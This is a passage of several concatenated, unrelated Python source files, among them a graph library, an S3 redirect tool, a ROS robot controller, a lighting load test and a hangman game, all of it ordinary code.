dev --> pre_ mean_pre = self.data_mean_stddev[pre_img_tile_name][0] stddev_pre = self.data_mean_stddev[pre_img_tile_name][1] norm_pre = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=mean_pre, std=stddev_pre) ]) pre_img = norm_pre(np.array(pre_img).astype(dtype='float64')/255.0) # normalize the images based on a tilewise mean & std dev --> post_ mean_post = self.data_mean_stddev[post_img_tile_name][0] stddev_post = self.data_mean_stddev[post_img_tile_name][1] norm_post = transforms.Compose([ transforms.ToTensor(), transforms.Normalize(mean=mean_post, std=stddev_post) ]) post_img = norm_post(np.array(post_img).astype(dtype='float64')/255.0) # convert eveything to arrays pre_img = np.array(pre_img) post_img = np.array(post_img) mask = np.array(mask) damage_class = np.array(damage_class) # replace non-classified pixels with background damage_class = np.where(damage_class==5, 0, damage_class) return {'pre_image': torch.from_numpy(pre_img).type(torch.FloatTensor), 'post_image': torch.from_numpy(post_img).type(torch.FloatTensor), 'building_mask': torch.from_numpy(mask).type(torch.LongTensor), 'damage_mask': torch.from_numpy(damage_class).type(torch.LongTensor), 'pre_image_orig': transforms.ToTensor()(pre_img_orig), 'post_image_orig': transforms.ToTensor()(post_img_orig), 'img_file_idx':imgs_dir[0:-1*(len(img_suffix))].split('/')[-1] + img_suffix, 'preds_img_dir':preds_dir} digraph.py ##Copyright (c) 2011 ## ##Permission is hereby granted, free of charge, to any person obtaining a ##copy of this software and associated documentation files (the "Software"), ##to deal in the Software without restriction, including without limitation ##the rights to use, copy, modify, merge, publish, distribute, sublicense, ##and/or sell copies of the Software, and to permit persons to whom the ##Software is furnished to do so, subject to the following conditions: ## ##The above copyright notice and this permission notice shall be included ##in all copies or substantial portions of the Software. ## ##THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ##OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ##FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL ##THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR ##OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ##ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR ##OTHER DEALINGS IN THE SOFTWARE. from __future__ import division import copy import graph class DirectedGraphError(Exception): pass class DirectedGraph(graph.Graph): """ A basic class for directed graphs. Multiple edges between nodes are not supported, although self loops are. Nodes, parent nodes and child nodes are contained in I{self.nodes}, I{self.parents} and I{self.children}. A node may be any hashable type. An edge is a tuple (or list) of nodes, (tail, head). Example: >>> import digraph >>> edge = (1, 2) >>> g = digraph.DirectedGraph() >>> g.add_node(node1) >>> g.add_node(node2) >>> g.add_edge(edge) (1, 2) >>> g 1 [] 2 [1] """ def __init__(self): """ Initialises an empty graph. A graph consists of a set of nodes and parents and children dictionaries containing adjacency information. """ #graph.Graph.__init__(self) self.nodes = set() self.parents = {} self.children = {} def __repr__(self): """ User friendly graph representation. @rtype: C{str} @return: C{str} """ s = '' for node in self.nodes: s += str(node) + ' ' + repr([parent for parent in self.parents[node]]) + '\n' return s def get_edges(self): """ @rtype: C{list} @return: list of graph edges """ return list(self.iterEdges()) def set_edges(self, value): """ @raise AttributeError: in all cases (read-only attribute) """ raise AttributeError("use addEdge method") edges = property(get_edges, set_edges, doc="the graph edges") def get_number_of_edges(self): """ @rtype: C{int} @return: number of edges in graph """ return sum(self.indegree(node) for node in self.iter_nodes()) def set_number_of_edges(self, value): """ @raise AttributeError: in all cases (read-only attribute) """ raise AttributeError("cannot set number of edges") num_edges = property(get_number_of_edges, set_number_of_edges, doc="number of edges in graph") def indegree(self, node): """ Returns the indegree (number of parents) of I{node}. @type node: hashable type @param node: graph node @rtype: C{int} @return: node degree """ return len(self.parents[node]) def outdegree(self, node): """ Returns the outdegree (number of children) of I{node}. @type node: hashable type @param node: graph node @rtype: C{int} @return: node degree """ return len(self.children[node]) def is_root(self, node): """ Tests whether I{node} has any parents. @type node: hashable type @param node: graph node @rtype: C{bool} @return: True if node has no parents, otherwise False """ return len(self.parents[node]) == 0 def is_leaf(self, node): """ Tests whether I{node} has any children. @type node: hashable type @param node: graph node @rtype: C{bool} @return: True if node has no children, otherwise False """ return len(self.children[node]) == 0 def deepcopy(self): """ A deepcopy of a graph has copies of the original node instances. @rtype: same type as graph instance @return: graph deepcopy """ copy_map = dict((node, copy.copy(node)) for node in self.nodes) acopy = self.__class__() for n in copy_map.values(): acopy.addNode(n) for v, w in self.iter_edges(): acopy.add_edge((copy_map[v], copy_map[w])) return acopy __deepcopy__ = deepcopy def add_node(self, node): """ Adds a node to the graph. @type node: hashable type @param node: a node """ super(DirectedGraph, self).add_node(node) if not node in self.parents: # if node has been previously added # we want a null operation self.parents[node] = set() self.children[node] = set() def del_node(self, node): """ Removes a node and all incident edges. Raises an error if the node is not in the graph. @type node: hashable type @param node: a node @raise ValueError: if node is not in graph """ super(DirectedGraph, self).del_node(node) # remove edges for parent in list(self.parents[node]): self.children[parent].remove(node) for child in list(self.children[node]): self.parents[child].remove(node) del self.parents[node] del self.children[node] def discard_node(self, node): """ Removes a node and all incident edges if the node is present. Does not raise an error if the node is not in the graph. @type node: hashable type @param node: a node @raise ValueError: if node is not in graph """ try: self.del_node(node) except ValueError: pass def add_edge(self, edge): """ Adds an edge to the graph. An exception is raised if one or both edge nodes is not in the graph. @type edge: C{tuple} of nodes @param edge: an edge, or pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = edge if not (self.has_node(p) and self.has_node(c)): raise ValueError('node(s) not in graph') self.children[p].add(c) self.parents[c].add(p) # return edge as tuple for the convenience of derived classes return p, c def del_edge(self, edge): """ Removes an edge from the graph. An exception is raised if the edge is not in the graph. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = edge if not (self.has_node(p) and self.has_node(c)): raise ValueError('node(s) not in graph') try: self.children[p].remove(c) self.parents[c].remove(p) except KeyError: raise ValueError('(%s, %s) is not in the graph' % edge) # return edge as tuple for the convenience of derived classes return p, c def discard_edge(self, edge): """ Removes an edge from the graph if it is present. No exception is raised if one or both edge nodes is not in the graph, or if the edge is not present. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = edge try: self.children[p].remove(c) self.parents[c].remove(p) except KeyError: pass # return edge as tuple for the convenience of derived classes return p, c def has_edge(self, edge): """ Tests whether I{edge} is in graph. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{bool} @return: True if edge is in graph, otherwise False """ try: return edge[0] in self.parents[edge[1]] except: return False def del_edges(self): """ Clears all edges (but not nodes) from the graph. """ for node in self.iterNodes(): self.parents[node] = set() self.children[node] = set() def is_subgraph(self, other): """ Returns True if, and only if, all nodes in self and all edges in graph are in other. @type other: L{DirectedGraph} @param other: a graph @rtype: C{bool} @return: True if all nodes and edges in graph are in I{other}, otherwise False """ if not self.nodes <= set(other.nodes): return False for node in self.iter_nodes(): if not self.children[node] <= set(other.children[node]): return False return True def __eq__(self, other): """ Returns True if, and only if, graph is equal to other. @type other: L{DirectedGraph} @param other: a graph @rtype: C{bool} @return: True if all nodes and edges in I{other} are in graph, otherwise False """ if self.nodes == set(other.nodes) and self.num_edges == other.num_edges: for node in self.iter_nodes(): if self.children[node] != set(other.children[node]): return False return True return False def graph_sum(self, *others): """ Returns a new graph containing the union of the edge sets of I{self} and the graphs in I{others}. All graphs must have equal node sets. @type others: iterable containing L{DirectedGraph} instances @param others: directed graphs @rtype: same type as graph @return: sum of graph and graphs in I{others} @raise DirectedGraphError: if not all graphs have equal node sets """ sum_ = self.copy() for other in others: if not sum_.nodes == set(other.nodes): raise DirectedGraphError('graph vertex sets must be equal') for edge in other.iter_edges(): sum_.add_edge(edge) return sum_ def graph_union(self, *others): """ Returns a graph containing the union of the node sets and edge sets of I{self} and the graphs in I{others}. All graphs must have distinct node sets (and edge sets). @type others: iterable containing L{DirectedGraph} instances @param others: directed graphs @rtype: same type as graph @return: union of graph and graphs in I{others} @raise DirectedGraphError: if any graphs share any nodes """ union = self.copy() for other in others: if self.nodes.intersection(other.nodes): raise DirectedGraphError('graph vertex sets must be distinct') for node in other.iter_nodes(): union.add_node(node) for edge in other.iter_edges(): union.add_edge(edge) return union def graph_difference(self, *others): """ Returns a graph containing the set difference of the edges sets of graph and the graphs in I{others}. All graphs must have equal node sets. @type others: iterable containing L{DirectedGraph} instances @param others: directed graphs @rtype: same type as graph @return: difference of graph and graphs in I{others} @raise DirectedGraphError: if not all graphs have equal node sets """ diff = self.copy() for other in others: if not diff.nodes == set(other.nodes): raise DirectedGraphError('graph vertex sets must be equal') for edge in other.iter_edges(): diff.discard_edge(edge) return diff def weak_components(self): """ Generates sets containing the sets of nodes in each weakly connected component (U{http://mathworld.wolfram.com/WeaklyConnectedComponent.html}). @rtype: C{generator} @return: a generator sets of nodes for each weakly connected component """ import traversals # use a bfs that ignores directions on edges unvisited = self.nodes.copy() adj = self.children.copy() for node in self.nodes: adj[node] |= self.parents[node] while unvisited: component = set(traversals.bfs(self, unvisited.pop(), pre=True, adj=adj)) unvisited -= component yield component components = weak_components def strong_components(self): """ Generates sets containing the sets of nodes in each strongly connected component (U{http://mathworld.wolfram.com/StronglyConnectedComponent.html}). @rtype: C{generator} @return: a generator of sets of nodes for each strongly connected component """ import traversals visited = set() order = list(traversals.dfs(self, post=True)) top_order = reversed(order) for node in top_order: if not node in visited: component = set() for node in traversals.dfs(self, node, pre=True, adj=self.parents): if not node in visited: component.add(node) visited.add(node) yield component def transposed(self): """ Returns the transpose of the graph. The transpose of a graph, I{G}, contains the same nodes as I{G}, but with the directions on the edges reversed. @rtype: same type as graph @return: the transposed graph """ transposed = self.__class__() for node in self.nodes: transposed.add_node(node) for edge in self.iter_edges(): transposed.add_edge((edge[1], edge[0])) return transposed def induced_graph(self, nodes): """ Returns the graph induced by the nodes in I{nodes}. The induced graph contains all nodes in I{nodes} and exactly those edges in the original graph between nodes in I{nodes}. precondition: all nodes in self @type nodes: iterable containing nodes @param nodes: nodes of induced graph @rtype: same type as graph @return: graph induced by I{nodes} """ g = self.__class__() for node in nodes: g.add_node(node) for node in g.nodes: for c in self.children[node]: if g.has_node(c): g.add_edge((node, c)) return g def iter_edges(self): """ Returns an iterator over the graph edges. @rtype: C{generator} @return: a generator of edges. The edges are generated in an arbitrary order """ for node in self.iter_nodes(): for c in self.children[node]: yield node, c def to_forest(self): """ Returns a L{Forest} of graphs. @rtype: L{Forest} @return: a forest containing (weakly) disconnected graph components """ from forest import Forest graphs = [self.induced_graph(component) for component in self.weak_components()] return Forest(graphs, 'iter_nodes') class DirectedGraph2(DirectedGraph): """ A directed graph which keeps track of its roots and leaves. """ def __init__(self): """ Creates an empty digraph. The graph keeps a record of its root and leaf nodes. i.e. Nodes with no parents / no children respectively. """ DirectedGraph.__init__(self) # root and leaf nodes are updated when # nodes / edges are added / deleted self.root_nodes = set() self.leaf_nodes = set() def copy(self): """ A copy of a graph shares the original node and edge instances. @rtype: same type as graph @return: graph copy """ acopy = super(DirectedGraph2, self).copy() acopy.root_nodes = self.root_nodes.copy() acopy.leaf_nodes = self.leaf_nodes.copy() return acopy def add_node(self, node): """ Adds a node to the graph. @type node: hashable type @param node: a node """ super(DirectedGraph2, self).add_node(node) # until edges are added a node is both root and leaf if self.outdegree(node) == 0: self.leaf_nodes.add(node) if self.indegree(node) == 0: self.root_nodes.add(node) def del_node(self, node): """ Removes a node, but not incident edges. Raises an error if the node is not in the graph. @type node: hashable type @param node: a node @raise ValueError: if node is not in graph """ # get copy of parents and children to update root and leaf nodes parents = self.parents[node].copy() children = self.children[node].copy() # remove the node super(DirectedGraph2, self).del_node(node) # update root and leaf nodes self.root_nodes.discard(node) self.leaf_nodes.discard(node) for node in parents: if self.outdegree(node) == 0: self.leaf_nodes.add(node) for node in children: if self.indegree(node) == 0: self.root_nodes.add(node) def add_edge(self, edge): """ Adds an edge to the graph. I{edge} is a tuple containing two nodes. An exception is raised if one or both edge nodes is not in the graph. @type edge: C{tuple} of nodes @param edge: an pair of nodes @rtype: C{tuple} of nodes @return: a pair of nodes @raise ValueError: if node(s) not in graph """ p, c = super(DirectedGraph2, self).add_edge(edge) self.root_nodes.discard(c) self.leaf_nodes.discard(p) return edge def del_edge(self, edge): """ Removes an edge from the graph. I{edge} is a tuple containing two nodes. An exception is raised if the edge is not in the graph. @type edge: C{tuple} of nodes @param edge: a pair of nodes @rtype: C{tuple} of nodes @return: pair of nodes @raise ValueError: if edge is not in graph """ p, c = super(DirectedGraph2, self).del_edge(edge) if self.outdegree(p) == 0: self.leaf_nodes.add(p) if self.indegree(c) == 0: self.root_nodes.add(c) from .customer_service import CustomerServiceAnalyzer from .dialogue import DialogueSentimentAnalyzer from .sentence import SentenceSentimentAnalyzer from .text import TextSentimentAnalyzer from .intent import IntentAnalyzer #from .word import WordSentimentAnalyzer lsst-sqre/ltd-mason1-10 """Command line interface to add directory redirect objects. """ from __future__ import (division, absolute_import, print_function, unicode_literals) from builtins import * # NOQA from future.standard_library import install_aliases install_aliases() # NOQA import argparse import os import textwrap import logging import boto3 from .s3upload import _upload_object log = logging.getLogger(__name__) log.addHandler(logging.NullHandler()) def run(): """Entrypoint for ltd-mason-make-redirects.""" args = parse_args() logging.basicConfig(level=logging.INFO) # create a bucket object session = boto3.session.Session( aws_access_key_id=args.aws_id, aws_secret_access_key=args.aws_secret) s3 = session.resource('s3') bucket = s3.Bucket(args.bucket) directories = [] for obj in bucket.objects.filter(Prefix=args.base_dir): dirname = os.path.dirname(obj.key) if dirname: directories.append(dirname) directories = set(directories) for dirname in directories: if dirname.endswith('/v') or dirname.endswith('/builds'): # Skip {product}/v or {product}/builds directories continue # create a directory redirect object redirect_metadata = {'dir-redirect': 'true'} cache_control = 'max-age={0}'.format(31536000) logging.info('Making redirect object at {0}'.format(dirname)) if not args.dry_run: _upload_object(dirname, content='', bucket=bucket, metadata=redirect_metadata, acl='public-read', cache_control=cache_control) def parse_args(): """Create an ``argparse.ArgumentParser`` instance that defines the command line interface for ltd-mason-make-directs. """ parser = argparse.ArgumentParser( prog='ltd-mason-make-redirects', description=textwrap.dedent("""Bulk-add directory courtesy redirect objects to an existing LSST the Docs bucket. These redirect objects are named after directories (without a trailing slash) and contain an ``x-amx-meta-dir-redirect=true`` HTTP header. The Fastly VCL code detects when these objects are being requested (e.g. example.com/dir) and issues a 301 redirect to example.com/dir/index.html). This script should only be run once to add redirects to existing builds. The regular ltd-mason and ltd-keeper workflows will maintain redirects subsequently. """), formatter_class=argparse.RawDescriptionHelpFormatter, epilog='See https://github.com/lsst-sqre/ltd-mason for more info.') parser.add_argument( '--bucket', help='LSST the Docs S3 bucket', required=True) parser.add_argument( '--base-dir', help='Directory to make redirects in (defaults to all directories)', default='') parser.add_argument( '--aws-id', help='AWS access key ID', required=True) parser.add_argument( '--aws-secret', help='AWS secret access key', required=True) parser.add_argument( '--dry-run', help='Dry-run, prevents objects from being uploaded', action='store_true', default=False) return parser.parse_args() #!/usr/bin/env python3 # -*- coding: utf-8 -*- import math import copy import random import collections import numpy as np import rospy from dynamic_reconfigure.server import Server from tf.transformations import quaternion_from_euler, euler_from_quaternion from std_msgs.msg import ColorRGBA from nav_msgs.msg import Odometry from geometry_msgs.msg import Twist, Pose2D, Vector3, Quaternion, Point, Pose from visualization_msgs.msg import Marker, MarkerArray from robotball_msgs.msg import IMU as myIMU from robotball_control.cfg import BilliardConfig from util import Vector2, wrap_pi_pi class BilliardController(object): def __init__(self): # Get parameters. default = rospy.get_param('/billiard_params') limits = default['limits'] self.config = default['config'] # Variables. self.me = rospy.get_namespace().strip('/') self.poses = {name: Pose2D() for name in default['robots']} cmd_vel_msg = Twist() bounced_x = False bounced_y = False out_of_limits_x = 0 out_of_limits_y = 0 # Virtual boundaries points for visaulization marker points = [(limits['x_left'], limits['y_bottom']), (limits['x_right'], limits['y_bottom']), (limits['x_right'], limits['y_top']), (limits['x_left'], limits['y_top'])] self.outer_bounds = [Point(x, y, 0) for x, y in points] self.bound_marker_pub = rospy.Publisher('/limits_viz', Marker, queue_size=1) self.marker_color = ColorRGBA(0, 1, 1, 1) # Visaulization marker for velocity vector marker = Marker() marker.ns = rospy.get_namespace() marker.header.frame_id = 'world' marker.type = Marker.ARROW marker.action = Marker.ADD marker.color = ColorRGBA(0, 1, 1, 1) marker.pose = Pose() marker.pose.position.z = 0.1776 # Sphero radius marker.lifetime = rospy.Duration(0) marker.frame_locked = True self.marker_pub = rospy.Publisher('cmd_viz', Marker, queue_size=1) # Publishers. self.vel_pub = rospy.Publisher('ref_vel', Twist, queue_size=1) # Dynamic reconfigure server. Server(BilliardConfig, self.reconf_cb) # Subscribers. subs = [rospy.Subscriber(f'/{name}/odom_estimated', Odometry, self.odom_cb, name, queue_size=1) for name in default['robots']] rospy.Subscriber('imu', myIMU, self.imu_cb, queue_size=1) # Wait until we get poses of all robots in the system. while all([item == Pose2D() for item in self.poses.values()]): rospy.sleep(0.5) # Main while loop r = rospy.Rate(10) cmd_vector = Vector2.from_norm_arg(self.config['set_speed'], random.uniform(-math.pi, math.pi)) while not rospy.is_shutdown(): # CONTROL # When the robot approaches the limits, reduce its speed. if (self.poses[self.me].y > limits['y_top'] - self.config['reduced_buffer'] or self.poses[self.me].y < limits['y_bottom'] + self.config['reduced_buffer'] or self.poses[self.me].x > limits['x_right'] - self.config['reduced_buffer'] or self.poses[self.me].x < limits['x_left'] + self.config['reduced_buffer']): cmd_vector.set_mag(self.config['reduced_speed']) else: cmd_vector.set_mag(self.config['set_speed']) # When the robot exits the limited area, turn it around. if self.poses[self.me].y > limits['y_top']: if not bounced_y: bounced_y = True cmd_vector.set_angle(-self.poses[self.me].theta) rospy.logwarn("y > top limit. New direction: %s", cmd_vector.arg()) out_of_limits_y += 1 elif self.poses[self.me].y < limits['y_bottom']: if not bounced_y: bounced_y = True cmd_vector.set_angle(-self.poses[self.me].theta) rospy.logwarn("y < bottom limit. New direction: %s", cmd_vector.arg()) out_of_limits_y += 1 if self.poses[self.me].x > limits['x_right']: if not bounced_x: bounced_x = True cmd_vector.set_angle(math.pi - self.poses[self.me].theta) rospy.logwarn("x > right limit. New direction: %s", cmd_vector.arg()) out_of_limits_x += 1 elif self.poses[self.me].x < limits['x_left']: if not bounced_x: bounced_x = True cmd_vector.set_angle(math.pi - self.poses[self.me].theta) rospy.logwarn("x < left limit. New direction: %s", cmd_vector.arg()) out_of_limits_x += 1 # When the robot returns to the allowed area, reset flags. if limits['x_left'] < self.poses[self.me].x < limits['x_right']: bounced_x = False out_of_limits_x = 0 # rospy.loginfo("X in bounds") if limits['y_bottom'] < self.poses[self.me].y < limits['y_top']: bounced_y = False out_of_limits_y = 0 # rospy.loginfo("Y in bounds") # If the robot stays out of bounds for too long, send to towards the middle of the arena. if out_of_limits_x > self.config['out_samples'] or out_of_limits_y > self.config['out_samples']: x = random.uniform(0.3 * limits['width'], 0.7 * limits['width']) y = random.uniform(0.3 * limits['height'], 0.7 * limits['height']) direction = Vector2(x, y) - Vector2(self.poses[self.me].x, self.poses[self.me].y) cmd_vector.set_angle(direction.arg()) out_of_limits_x = 0 out_of_limits_y = 0 self.marker_color = ColorRGBA(0, 1, 1, 1) # AVOID prev_speed = cmd_vector.norm() res_vector = copy.copy(cmd_vector) for robot in self.poses: if robot != self.me: delta_x = self.poses[self.me].x - self.poses[robot].x delta_y = self.poses[self.me].y - self.poses[robot].y delta = Vector2(delta_x, delta_y) if delta.norm() < self.config['safe_dist']: res_vector = res_vector + delta * self.config['repulsion'] self.marker_color = ColorRGBA(1, 0.5, 0, 1) res_vector.set_mag(prev_speed) cmd_vel_msg.linear.x = res_vector.norm() cmd_vel_msg.linear.y = res_vector.arg() self.vel_pub.publish(cmd_vel_msg) # VISUALIZATION angle = Quaternion(*quaternion_from_euler(0, 0, cmd_vel_msg.linear.y)) scale = Vector3(cmd_vel_msg.linear.x, 0.08, 0.08) marker.header.stamp = rospy.get_rostime() marker.pose.position.x = self.poses[self.me].x marker.pose.position.y = self.poses[self.me].y marker.pose.orientation = angle marker.scale = scale marker.color = self.marker_color self.marker_pub.publish(marker) r.sleep() def odom_cb(self, msg, args): self.poses[args].x = msg.pose.pose.position.x self.poses[args].y = msg.pose.pose.position.y def imu_cb(self, msg): self.poses[self.me].theta = msg.euler.z def reconf_cb(self, config, level): self.config = config rospy.loginfo("Paramaters updated!") marker = Marker() marker.header.frame_id = 'world' marker.ns = rospy.get_namespace() marker.id = 1 marker.type = Marker.LINE_STRIP marker.action = Marker.ADD marker.pose = Pose(Point(), Quaternion(0, 0, 0, 1)) marker.scale = Vector3(0.05, 0, 0) marker.color = ColorRGBA(1, 0, 0, 1) marker.lifetime = rospy.Duration(0) marker.points = self.outer_bounds marker.points.append(marker.points[0]) self.bound_marker_pub.publish(marker) marker = Marker() marker.header.frame_id = 'world' marker.ns = rospy.get_namespace() marker.id = 2 marker.type = Marker.LINE_STRIP marker.action = Marker.ADD marker.pose = Pose(Point(), Quaternion(0, 0, 0, 1)) marker.scale = Vector3(0.05, 0, 0) marker.color = ColorRGBA(1, 1, 0, 1) marker.lifetime = rospy.Duration(0) r = self.config['reduced_buffer'] shifts = [(r, r), (-r, r), (-r, -r), (r, -r)] marker.points = [Point(p.x + s[0], p.y + s[1], 0) for p, s in zip(self.outer_bounds, shifts)] marker.points.append(marker.points[0]) self.bound_marker_pub.publish(marker) return config if __name__ == "__main__": rospy.init_node("ref_follower") try: node = BilliardController() except rospy.ROSInterruptException: pass from random import randint, choice from game.action import ActionType, Turn, Direction, Step from game.character import Character, ActionNotAllowedError from game.game import Game, UnknownPlayerError, Lobby, GameStartedError from game.grid import Grid from game.grid_def import OBSTACLES, WALLS from game.player import Player class GameManager: def __init__(self): grid = Grid(24, 20, obstacles=OBSTACLES, walls=WALLS) self.char_faces = ['char1', 'char2', 'char3', 'char4'] self.lobby = Lobby() self.game = None def register_player(self, id: str, name: str): if self.game is not None: raise GameStartedError() player = Player(id, name) self.lobby.register_player(player) # char = Character(self.char_faces.pop()) # self.game.add_character(char, player) # # char.spawn((randint(1, 24), randint(1, 20)), choice(list(Direction))) def is_player_registered(self, player_id): try: (self.game or self.lobby).get_player(player_id) return True except UnknownPlayerError: return False def action(self, char_id, action_type, params): char = self.game.get_character(char_id) if 'step' in params: params['step'] = Step[params['step']] if 'turn' in params: params['turn'] = Turn[params['turn']] try: self.game.action(char, ActionType[action_type], **params) except ActionNotAllowedError: pass def state(self): return self.game.state() bin/collector_loadtest.py import sys sys.path.append('bin') from run_local import log from light9.collector.collector_client import sendToCollector from light9.namespaces import L9, DEV from twisted.internet import reactor import time import logging log.setLevel(logging.DEBUG) def loadTest(): print("scheduling loadtest") n = 2500 times = [None] * n session = "loadtest%s" % time.time() offset = 0 for i in range(n): def send(i): if i % 100 == 0: log.info('sendToCollector %s', i) d = sendToCollector("http://localhost:999999/", session, [[DEV["backlight1"], L9["color"], "#ffffff"], [DEV["backlight2"], L9["color"], "#ffffff"], [DEV["backlight3"], L9["color"], "#ffffff"], [DEV["backlight4"], L9["color"], "#ffffff"], [DEV["backlight5"], L9["color"], "#ffffff"], [DEV["down2"], L9["color"], "#ffffff"], [DEV["down3"], L9["color"], "#ffffff"], [DEV["down4"], L9["color"], "#ffffff"], [DEV["houseSide"], L9["level"], .8], [DEV["backlight5"], L9["uv"], 0.011]]) def ontime(dt, i=i): times[i] = dt d.addCallback(ontime) reactor.callLater(offset, send, i) offset += .002 def done(): print("loadtest done") with open('/tmp/times', 'w') as f: f.write(''.join('%s\n' % t for t in times)) reactor.stop() reactor.callLater(offset + .5, done) reactor.run() if __name__ == '__main__': loadTest() hangman.py import random # Variables words = ['abasement', 'abbey', 'albatross', 'aardvark', 'abbacus', 'baleful', 'bazooka', 'barnacle', 'breeding', 'begging', 'cramp', 'clapping', 'credentials', 'computer', 'crimea', 'defense', 'dugout', 'decrypt', 'delegate', 'dire', 'echo', 'extreme', 'earnings', 'elevate', 'easement', 'forgery', 'flatter', 'files', 'freakish', 'fleet', 'grabbing', 'glamour', 'groping', 'gorgeous', 'goofy', 'hacking', 'horrible', 'horrendous', 'hangman', 'helpful', 'idea', 'imagaine', 'imagination', 'iterate', 'iteration', 'joyful', 'jayride', 'jamming', 'jokester', 'jackal', 'kayak', 'klutz', 'keeping', 'keep', 'knowledge', 'leaping', 'lords', 'landing', 'ledger', 'ladder', 'meany', 'massacre', 'mobile', 'manatee', 'monster', 'noodle', 'operation', 'plausible', 'question', 'radioactive', 'stenographer', 'typewriter', 'uninformed', 'voyeurism', 'willful', 'xray', 'youth', 'zoology' ] answer = random.choice(words).lower() good_letters = [''] bad_letters = [''] chances = 10 print('Welcome to Hangman!!!') print('You have 10 guesses to figure out the secret word!') while True: if chances == 9: print('-----------------') if chances == 8: print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 7: print(' ------ ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 6: print(' ------ ') print('| | ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 5: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('| ') print('-----------------') if chances == 4: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| ') print('| ') print('| ') print('-----------------') if chances == 3: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /| ') print('| / | ') print('| / | ') print('| | ') print('| | ') print('| | ') print('| | ') print('| ') print('| ') print('| ') print('-----------------') if chances == 2: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /|\ ') print('| / | \ ') print('| / | \ ') print('| | ') print('| | ') print('| | ') print('| | ') print('| ') print('| ') print('| ') print('-----------------') if chances == 1: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /|\ ') print('| / | \ ') print('| / | \ ') print('| | ') print('| | ') print('| | ') print('| | ') print('| / ') print('| / ') print('| / ') print('-----------------') print('Here is your word to guess: ') hint = [letter if letter in good_letters else '-' for letter in answer] if '-' not in hint: print('CONGRATS!!! YOU WIN!!!') print('You guessed the answer, ' + answer) break print(''.join(hint)) guess = input('Guess a letter: ').lower() if guess in good_letters or guess in bad_letters: print('You already guessed that letter! Try again!') elif guess in answer: good_letters.append(guess) print('You guess a correct letter!') else: chances -= 1 if chances == 0: print(' ------ ') print('| | ') print('| --- ') print('| / \ ') print('| / x x \ ') print('| | /_ | ') print('| | | ') print('| \ ... / ') print('| \ / ') print('| --- ') print('| | ') print('| | ') print('| /|\ ') print('| / | \ ') print('| / | \ ') print('| | ') print('| | ') print('| | ') print('| | ') print('| / \ ') print('| / \ ') print('| / \ ') print('-----------------') print('YOU LOSE!!!') print('The answer was ' + answer) break bad_letters.append(guess) print('UH-OH! That letter isnt in the word! You have ' + str(chances) + ' guesses left!') indico/modules/designer/operations.py # This file is part of Indico. # Copyright (C) 2002 - 2020 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from __future__ import unicode_literals from flask import session from indico.modules.designer.models.templates import DesignerTemplate from indico.modules.events import EventLogKind, EventLogRealm def update_template(template, title, data, is_clonable, backside_template_id=None, clear_background=False): """Update an existing template. :param template: The template to be updated :param title: An `EventType` value :param data: A dict containing the template data (width, height, items, etc) :param is_clonable: Whether it is possible to clone this template :param backside_template_id: The ID of the template used as a backside :param clear_background: Whether to remove the background image of the template """ if template.data['width'] != data['width'] or template.data['height'] != data['height']: query = DesignerTemplate.query.filter(DesignerTemplate.backside_template == template) for tpl in query: tpl.backside_template = None if tpl.event: tpl.event.log(EventLogRealm.event, EventLogKind.negative, 'Designer', 'Backside removed', session.user, data={'Template': tpl.title, 'Reason': 'Dimensions of backside changed', 'Backside': template.title}) template.title = title template.data = dict({'background_position': 'stretch', 'items': []}, **data) template.backside_template = DesignerTemplate.get(backside_template_id) if backside_template_id else None template.is_clonable = is_clonable if clear_background: template.background_image = None if template.event: template.event.log(EventLogRealm.event, EventLogKind.positive, 'Designer', 'Badge template updated', session.user, data={'Template': template.title}) #! /usr/bin/env python import binascii import struct import os import sys import time import subprocess as sp import tarfile import hashlib import platform import gzip import codecs try: import argparse got_argparse = 